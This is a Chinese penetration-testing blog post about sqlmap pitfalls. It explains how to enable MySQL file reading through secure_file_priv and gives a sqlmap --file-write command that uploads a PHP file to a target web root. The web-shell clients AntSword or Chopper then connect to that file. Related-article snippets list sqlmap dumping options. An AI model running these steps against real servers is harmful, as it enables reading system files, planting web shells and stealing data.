使用sqlmap中遇到的一些坑

最新推荐文章于 2024-07-30 15:35:35 发布

帅大大的架构之路

最新推荐文章于 2024-07-30 15:35:35 发布

阅读量3k

点赞数

分类专栏：渗透测试文章标签： sqlmap

本文链接：https://blog.csdn.net/ss810540895/article/details/108768724

版权

渗透测试专栏收录该内容

18 篇文章 9 订阅

订阅专栏

找到了一个注入点，然后用sqlmap也很容易就跑出了库表数据，
但是在读取目标服务器系统文件和上传文件的过程中遇到一些小问题

1.使用–file-read 命令的时候不能读取到系统文件

原因：mysql里面有个权限不对，查看该权限命令

show global variables like 'secure_file_priv';
| secure_file_priv    |    NULL   |

mysql5.7之后这里默认是NULL，需要改成空

| secure_file_priv    |       |

在/etc/my.cnf 添加secure_file_priv = 然后重启数据库
这样就可以读写系统文件了

2.另外在写入文件到目标服务器的时候

sqlmap -u 'http://ss.ss.com/index.php?s=news&cid=17' --file-write 1.php --file-dest /var/www/test/1.php

/var/www/test/1.php

后面记得跟文件名，要不然写不进去

最后就是蚁剑或者菜刀连接了~~

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

帅大大的架构之路

关注关注

0
点赞
踩
6

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

关于sqlmap的两个小坑

xiaoi123的博客

11-21

780

i春秋作家：__LSA__ 0x00 概述近日在利用sqlmap注入测试时遇到一个奇怪的现象，高版本sqlmap无法检测出注入，但是低版本的可以测出注入，并且能跑出数据不是误报，经过对比测试和查看sqlmap源码，发现两个小坑。0x01 情景重现注入点形式：json……”whereparams”:[{“name”:”keyWord”,”value”:”test”}]}可注入参数：valuesql...

Windows【工具 05】使用freeSSHd搭建sftp环境（安装+配置+避坑）freeSSHd version 1(1)

05-04

1823

官方网址已经停止维护，网盘文件版本为1.3.1链接：https://pan.baidu.com/s/1X-4i9pWGKOsCFEByfPXhig?pwd=xp6f提取码：xp6f。

参与评论您还未登录，请先登录后发表或查看评论

sqlmap表找不到

3569

02-11

5469

以下是从SQLMAP帮助文档中看到的，希望有用。暴力破解表名参数：–common-tables 当使用–tables无法获取到数据库的表时，可以使用此参数。通常是如下情况： 1、MySQL数据库版本小于5.0，没有information_schema表。 2、数据库是Microssoft Access，系统表MSysObjects是不可读的（默认）。 3、当前用户没有权限读取系

【网络安全】SQLMap详细使用教程

最新发布

程序员若风的博客

07-30

927

SQL注入是一种广泛存在于Web应用程序的漏洞，可以导致敏感数据泄露、系统破坏等严重后果。SQLMap是一款自动化SQL注入工具，它可以帮助渗透测试人员快速发现和利用SQL注入漏洞。本文将介绍SQLMap的详细使用教程和常用命令。

信息系统安全实验之SQLMap工具使用综合实验

7xun's space

04-18

590

切换到PC1的命令行的相应目录下，输入“python sqlmap.py -u "http:// 192.168.161.135/ry.php?ry_id=1"”，其中“-u”参数用于指定注入点的URL。（2）根据SQL注入的原理，可以得到一种防范方法，就是对构成网站的目录中（在实验中该目录为C:/code/sql）的相关php文件（比如ry.php）进行修改，这样可以使得SQLMap无法检测到注入点。（1）在本次实验中，我注意到：注入点已经提前给出，而如果注入点没有给出的话，就需要我们手动寻找注入点。

掌握SQL注入利器:SQLMap使用入门教程及技巧分享

分享Python知识

08-07

568

掌握SQL注入利器:SQLMap使用入门教程及技巧分享

sqlmap检索DBMS信

weixin_45905671的博客

02-20

283

sqlmap检索DBMS信息 sqlmap检索DBMS banner 获取后端数据库banner信息参数 --banner或者-b sqlmap检索DBMS当前数据库获取当前数据库名参数 --current-db sqlmap检索DBMS当前主机名获取主机名参数 --hostname sqlmap检索DBMS用户信息 sqlmap探测当前用DBA 探测当前用户是否是数据库管理员参数 -...

常用的渗透测试工具SQLMap

_Co1a

12-10

597

SQLMap详解 sqlmap是一个自动化的SQL注入工具，其主要功能是扫描、发现并利用给定的url的SQL注入漏洞，内置了很多绕过插件，支持的数据库是MySQL、Oracle、PostgreSQL、Microsoft SQL Server、Microsoft Access、IBM DB2、SQLite、Firebird、Sybase和SAP MaxDB。sqlmap采用了以下5种独特的SQL注入技术。基于布尔类型的盲注，即可以根据页面判断条件真假的注入基于时间的盲注，即不能根据页面返回的内容判断任何

使用()控件的saveas方法可以将上传文件保存到服务器.,JS中用execCommand("SaveAs")保存页面兼容性问题解决方案...

weixin_28804631的博客

08-09

1042

开发环境：ASP.NET MVC，其他环境仅供参考。问题描述：在开发中遇到这样的需求，保存页面，通常使用JavaScript的saveAs进行保存，各浏览器对saveAs支持，见下表。代码一：初始保存的代码，只有IE6，7，8支持。function CmdSave() {var OW = window.open('', "_blank", "");var DD = new Date();OW.do...

【nodejs】使用express搭建一个RESTful API（二）：用户注册和登录

杨小花的一日一记

06-30

1226

我们首先要在数据库中创建一个数据库，然后创建一张user表，表中有uid,username,password三个字段。其中，uid是自增字段。 npm中安装mysql并配置 npm install mysql --save 在文件根目录下，新建一个文件夹叫config，这里面放一些配置文件。我们新建一个db.js。 // 数据库配置文件 module.exports = { mysql:...

sqlmap使用方法

08-26

sqlmap -p 指定测试参数 -b 获取banner --dbs 列举数据库 --is-dba 是否是管理员权限 --current-db 当前数据库 --current-user 当前用户 --tables 列举数据库的表名 --count 检索所有条目数 --columns 获取表的列名 --dump 获取表中的数据，包含列 --dump-all 转存DBMS数据库所有表项目 --level 测试等级(1-5)，默认为1 -v 显示详细信息读取数据库--->读取表---->读取表的列---->获取内容

MyBatis学习笔记

jacksonary的博客

04-25

1218

先做个科普吧，MyBatis是其3.0以后的叫法，之前的版本都叫iBatis，这个名字肯定听过吧，也是大名鼎鼎的Apache旗下的产品，后来易主谷歌，正式改名为MyBatis，代码迁到github上。它是一种持久化框架，和Hibernate一样都是ORM(Object Relation Mapping，对象关系映射)框架，他们需要完成的任务都是将JavaBean映射成数据库中的一条记录。不...

[渗透&攻防] 二.SQL MAP工具从零解读数据库及基础用法

热门推荐

杨秀璋的专栏

07-18

1万+

这是最近学习渗透和网站攻防的文章，希望能深入地学习这部分知识，自己作为一个初学者，前一篇文章从数据库原理解读了防止SQL注入，这篇文章通过SQL MAP工具简单介绍其用法及原理，自己仍在慢慢探索网络攻防和渗透，希望文章对你有所帮助，尤其是学习网络安全的初学者，如果文章中存在错误或不足之处，还请海涵~

sqlmap 获取不到表_渗透小技巧 sqlmap_dns注入配置方法

weixin_39572794的博客

12-09

1015

网上针对sqlmap进行dns注入的相关文章太少，只是简单介绍了下--dns-domain参数，相关的实战文章要么就写的模糊或者一笔带过，搞的云里雾里(主要是菜，关键还没大佬带)。然后自己参考网上的方法自己重新搞了一遍。0X00需要准备的东西，sqlmap、windows盲注一个、两个域名、一台外网服务器。某次搞事情的时候碰到一个时间盲注，碰巧是台windows的，想起dns注入的方法。...

sqlmap详细的参数功能介绍（全面）

weixin_46709219的博客

11-13

5685

目录介绍命令参数指定目标直连数据库服务型数据库（前提知道数据库用户名和密码）文件型数据库（前提知道数据库绝对路径） URL探测文件读取目标 Google dork注入 Http参数设置请求方法 POST提交参数设置参数分隔符设置Cookie 设置User-Agent Host Referer 额外的HTTP头部协议认证设置代理 Tor匿名网络设置...

Sqlmap常用命令总结及注入实战（Access、mysql）

上善若水~的博客

05-14

1103

sqlmap常用命令总结：注意：命令为kali linux中运行的（windows中用python sqlmap.py执行） 1#、注入六连： 1. sqlmap -u “http://www.xx.com?id=x” 【查询是否存在注入点 –dbs 【检测站点包含哪些数据库 3. --curre

测试工具-sqlmap篇

weixin_42902126的博客

06-27

6092

sqlmap支持直连，通过以下命令来直连。 1、服务型数据库：mysql，oracle，sqlserver，postgresql等服务型数据库(前提知道数据库用户名和密码): mysql数据库root账户默认不支持外链，参考文档：https://qa.1r1g.com/sf/ask/3435601921/ 2、文件型数据库：sqlite，access，firebird等文件型数据库(前提知道数据库绝对路径)： sqlmap获取目标单一url探测参数使用 -u 或 --url URL格式：http(s

kali中sqlmap使用教程

09-12

要在Kali中使用sqlmap，可以按照以下步骤进行操作： 1. 首先，确保已经安装了Kali虚拟机，并打开虚拟机。 2. 打开终端，输入以下命令来运行sqlmap工具： ``` sqlmap -U target website --dbs ``` 这个命令将会获取目标网站的所有数据库名。请注意，将"target website"替换为你要测试的网站的URL。 3. 扫描到数据库系统后，我们可以继续获取表。对于特殊的数据库系统，比如Microsoft Access，可以使用以下命令来获取表名： ``` sqlmap -U target website --tables ``` 这个命令将会获取数据库中的所有表名。需要注意的是，使用sqlmap时，请参考官方手册以获取详细的使用方法和参数说明。同时，在获取数据库名和表名时，请遵循原始的字母大小写，不要进行修改。